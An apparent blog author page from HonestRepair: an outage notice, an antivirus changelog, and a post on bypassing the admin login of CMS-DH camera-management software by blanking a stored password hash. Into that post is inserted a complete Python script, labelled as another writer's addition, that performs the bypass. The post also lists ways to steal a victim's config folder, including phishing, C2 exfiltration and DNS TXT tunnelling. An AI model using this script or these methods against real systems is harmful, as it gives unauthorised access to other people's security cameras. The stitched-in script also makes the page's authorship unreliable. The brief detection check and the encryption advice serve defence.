All posts by Justin Grimes

(@zelon88) - The founder, lead developer, and DPO for HonestRepair.

Service Outages Due To Network Upgrades (Updated)

It’s once again time to reconfigure our ever-growing storage arrays. With about 2 days’ worth of backup capacity remaining, I have bought new backup storage and am in the process of copying everything over.

Once the initial data transfer is complete I will disable the Cloud by enabling “Maintenance Mode” and give it one quick sync. Then I will reconfigure the Cloud to run with one backup copy as primary. This will allow me to disable maintenance mode and resume public Cloud operations with one backup acting as the primary Data store and the other backup copy as a backup.

With the Cloud operating out of backup storage I can reconfigure the primary Cloud Data array without worrying about redundancy or the clock ticking. After the primary Cloud Data array is rebuilt I can sync it with the temporary primary data and recycle the extra disks back into the primary Cloud Data array for added redundancy.

The tl;dr is: our service might be spotty this weekend. We will do our best to keep the platform online and stable but there are times when we will need to take things offline for short periods. Please pardon these outages while we work to expand our capabilities and improve our services.

Update 4/30/2019

The upgrade is mostly complete and the platform is stable. There were several compatibility hiccups that prevented configuring the main storage arrays the way I wanted but I’ve ordered a new RAID controller that should hopefully do the trick when it gets here. In the meantime we’re running the Cloud out of backup storage. There will be a little bit of downtime involved when installing the new RAID controller and the Cloud will be briefly unavailable during the changeover. The upgrade is about 75% complete. Thanks for sticking with us, and keep checking back for more updates!

Update 5/6/2019

I received the RAID parts and will be installing them this week. Expect downtime in the evenings all this week while I get the hardware configured and work out the kinks.

Update 5/16/2019

The upgrade is complete and testing has passed. The Cloud has been off backup storage and running out of a new primary storage array since this past weekend, but I kept a close eye on everything for the first few days before calling it complete. The new RAID controller and drives seem to be working well and there are no signs of problems. The new configuration is also more robust than before. Our primary storage array can withstand multiple simultaneous drive failures without losing any user-supplied data and the new backup array adds yet another layer of redundancy. The OS drive on this server was also upgraded to a unit that yields a 10x performance boost over the last configuration. That’s right, our new OS storage configuration is ten times faster than before, with sub-0.5ms random seek time and up to 3GB/s of disk transfer.
This also frees up hardware that can eventually be installed into other HonestRepair servers, further enhancing our capabilities. Before I get around to that I think I want to install an onboard LCD touch screen on our DNS/DHCP server, and possibly write a How-To about it. Stay tuned!

CMS-DH Admin Login Bypass

BACKGROUND

This information is also available on GitHub.

CMS-DH is an old generic application created for resale, probably by Dahua or one of its divisions. It is used to control Digimerge security cameras. Flir now owns Digimerge and everybody wants to forget this software exists. In reality it doesn’t matter and I don’t really care. There are configuration entries to change the name of the application in the toolbar menus, which should give you an idea of how generic it was meant to be.

If you lose access to CMS-DH it can be extremely difficult to connect to the DVR and make changes to it. The documentation for Digimerge hardware is practically non-existent, and the company itself doesn’t exist anymore (it has been absorbed into Flir Security, who don’t even have a TLS cert on their security-centric website). The lack of information is compounded by the fact that there seem to be several different versions of the Digimerge documentation floating around, and not many of them contain accurate or useful information.

Luckily, the hardware can be configured from a computer through CMS-DH. CMS-DH is what I like to call “third world software”, meaning that it was written without any consideration for security, nobody wants to own support for it, and it hangs all its secrets out in the open.

GAINING ACCESS

This hack was tested to work with the following versions (although I’m not sure of a way to find this info until you log in at least once):

App Version: 1.8.8.24

Service Version: 1.8.8.10

Codec Version: 3.0.2.3

Download Dll Version: 3.0.0.1

CMS-DH stores configuration data in C:\Users\USERNAME\Documents\CMS-DH. The “.ems” files in this folder contain the configuration data for CMS-DH and can be opened in Notepad or any other text editor.

For the hack to work you need a copy of CMS-DH that is already installed and configured with devices, including an admin connection to a DVR. The hack only gets you into CMS-DH itself. If CMS-DH is connected to devices (using the device password) you will have access to those devices once you are in; if it is not connected to any devices, this gets you nowhere. In other words, the hack is only valuable against a pre-configured CMS-DH that you do not have credentials for.

To gain access to CMS-DH without valid login credentials, open “Registry.ems” with a text editor and locate the “PASSWORD=” line.

The “PASSWORD=” line contains the user password in hashed form. A little further down you’ll see another line that starts with “LOGINAC=” followed by the plain text username.

Start by backing up “Registry.ems”, then wipe out the hashed password string from the “PASSWORD=” line, so “PASSWORD=54883fsdf83nn2nb4” becomes simply “PASSWORD=”. Save the file and launch CMS-DH. The application will start and skip the login screen. Note that this does not recover the original password; the hash is simply gone, so keep the backup if you ever need to restore the original login.
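As an added example (my code, not the author’s and not CMS-DH’s), here is the same procedure scripted in Python: back up Registry.ems, blank the PASSWORD= value while leaving every other line untouched, and pull the LOGINAC username out of the original. It assumes Registry.ems is plain text with one KEY=VALUE entry per line and is UTF-8, which the post implies but does not spell out; the sample file contents and the hash value are constructed. The looks_bypassed check at the end is the defender’s side of the same fact: a LOGINAC user sitting next to an empty PASSWORD= is exactly what this bypass leaves behind.

```python
"""Blank the cached PASSWORD= entry in a CMS-DH Registry.ems file.

Added example, not CMS-DH's own code. Assumes (the post implies, but does not
state) that Registry.ems is plain text with one KEY=VALUE entry per line.
"""
import shutil
from pathlib import Path

# Constructed stand-in for a Registry.ems; the hash value is made up.
SAMPLE_EMS = "APPNAME=CMS-DH\r\nPASSWORD=54883fsdf83nn2nb4\r\nLOGINAC=admin\r\n"


def parse_ems(text: str) -> dict:
    """Map KEY -> VALUE for every KEY=VALUE line; lines without '=' are skipped."""
    entries = {}
    for raw in text.splitlines():
        if "=" not in raw:
            continue
        key, value = raw.split("=", 1)
        entries[key.strip().upper()] = value.strip()
    return entries


def blank_password(text: str) -> str:
    """Return text with the PASSWORD= line emptied and every other byte intact.

    Line endings are preserved (keepends=True) so a Windows CRLF file stays CRLF.
    """
    out = []
    for line in text.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        ending = line[len(body):]
        if body.upper().startswith("PASSWORD="):
            key, _, _ = body.partition("=")
            body = key + "="  # "PASSWORD=54883fsdf83nn2nb4" -> "PASSWORD="
        out.append(body + ending)
    return "".join(out)


def bypass_login(ems_path: Path) -> str:
    """Back up Registry.ems to Registry.ems.bak, blank PASSWORD=, return the LOGINAC user.

    The backup is the only way back to the original state, because the hash is
    destroyed rather than recovered. Bytes are used rather than text mode so
    CRLF line endings are not rewritten on Windows.
    """
    shutil.copy2(ems_path, ems_path.with_name(ems_path.name + ".bak"))
    original = ems_path.read_bytes().decode("utf-8")  # UTF-8 is an assumption
    ems_path.write_bytes(blank_password(original).encode("utf-8"))
    return parse_ems(original).get("LOGINAC", "")


def looks_bypassed(text: str) -> bool:
    """Defender's check: a LOGINAC user with an empty PASSWORD= is the bypass's footprint."""
    entries = parse_ems(text)
    return entries.get("PASSWORD") == "" and bool(entries.get("LOGINAC"))


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "Registry.ems"
        path.write_bytes(SAMPLE_EMS.encode("utf-8"))
        print("LOGINAC user:", bypass_login(path))
        print("bypassed:", looks_bypassed(path.read_bytes().decode("utf-8")))
```

Point bypass_login at the real C:\Users\USERNAME\Documents\CMS-DH\Registry.ems (with CMS-DH closed) and it performs the edit described above; run looks_bypassed over the same file on a machine you administer to spot a config that has already been tampered with.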

STEALING CREDENTIALS

We know that an attacker can wipe out the cached password from CMS-DH and that the application will then completely skip the login screen. An attacker can leverage this to gain access to DVRs they are not authorized for by obtaining a copy of someone else’s CMS-DH config directory. Because all of the configuration data for the connected devices is stored in that directory, a successful attacker has everything they need to log in and gain unauthorized access to a local security system.

Possible attack vectors for stealing the directory include:

  1. Phishing the user and convincing them to send you the CMS-DH “log files.”
  2. A misconfigured Windows share.
  3. Booting the machine from USB and copying the contents of the unencrypted HDD.
  4. Making the user run a script which dumps the contents of the CMS-DH directory somewhere.
  5. Gaining access to the machine (physical or remote) and exfiltrating the files to a C2 server.
  6. The files are small enough to exfiltrate through DNS TXT queries.

Since the whole attack hinges on a handful of plain-text files in the user’s Documents folder, full-disk encryption and tight permissions on that folder (and on any share that exposes it) are the practical defences until the software is retired.

HRScan2 v1.6 – PHP-AV App to v3.9. Defs to v4.7. Add SHA1 detection

-v1.6.
-PHP-AV App to v3.9. Defs to v4.7.
-Add support for SHA1 hash detection ($data3, $virus[4]).
-Add code detection for lots of malicious files. 
-Includes malicious code samples for Golang, Python, C++, node.js, Java, Javascript, PowerShell, Ruby, VBS & more.
-Fix obscenely large logfiles by removing filename logging during scanning.
-To continue logging filenames like before (and generate really large log files) set $CONFIG['debug'] = True;
-Fixed indented code blocks.